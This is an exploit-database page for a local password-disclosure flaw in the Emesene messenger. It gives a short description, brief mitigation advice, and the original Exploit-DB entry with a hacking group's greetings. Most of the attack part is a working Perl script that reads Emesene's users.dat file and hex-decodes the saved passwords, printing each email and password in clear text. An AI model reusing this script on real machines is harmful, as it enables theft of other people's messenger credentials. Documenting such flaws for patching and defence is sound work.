header-logo
Suggest Exploit
vendor:
Emesene
by:
Daniel Godoy
5.5
CVSS
MEDIUM
Password Disclosure
200
CWE
Product Name: Emesene
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Linux
2012

Emesene Password Disclosure

This exploit allows an attacker to disclose passwords in Emesene, a software used for instant messaging. The script reads a file called 'users.dat' located in the '.config/emesene1.0' directory and prints out the email and corresponding password in clear text. This vulnerability can be exploited if the user has enabled the 'remember password' feature.

Mitigation:

To mitigate this vulnerability, users should disable the 'remember password' feature in Emesene. Additionally, users should consider using a strong and unique password for their Emesene account.
Source

Exploit-DB raw data:

 # Exploit Title: Emesene Password Disclosure
# Category: Local
# Date: 29/06/2012
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Sofware web: http://blog.emesene.org/p/downloads.html
# Tested on: Linux

The only requirement to run the script is that the customer is
highlighted remember password.

[Comment]
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,
Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
InyeXion, ksha, zerial,LinuxFer, Scorp
    her0, r0dr1 y demas user de RemoteExecution
    www.remoteexecution.info www.remoteexcution.com.ar
    #RemoteExecution Hacking Group

[PoC]

#!/usr/bin/perl
#/home/$HOME/.config/emesene1.0
system("clear");
print "[ EMESENE PASSWORD DISCLOSURE ]\n";
print "TESTED ON UBUNTU 10.04 LTS\n";
my $pwn="users.dat";
open (ENTRADA,"<$pwn") || die "ERROR: No puedo abrir el fichero $pwn\n";
$cantidad++ while <ENTRADA>;
close (ENTRADA);
open (ENTRADA,"<$pwn") || die "ERROR: No puedo abrir el fichero $pwn\n";
@source = <ENTRADA>;
for($i = 0; $i < $cantidad; $i++)
    {
    @password= split(":", $source[$i]);
    print "Mail: ".$password[0]." Password PWND! => ";
    print pack("H*", $password[1]), "\n";       
    }
close (ENTRADA);

-------------------------
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com
cqrsecured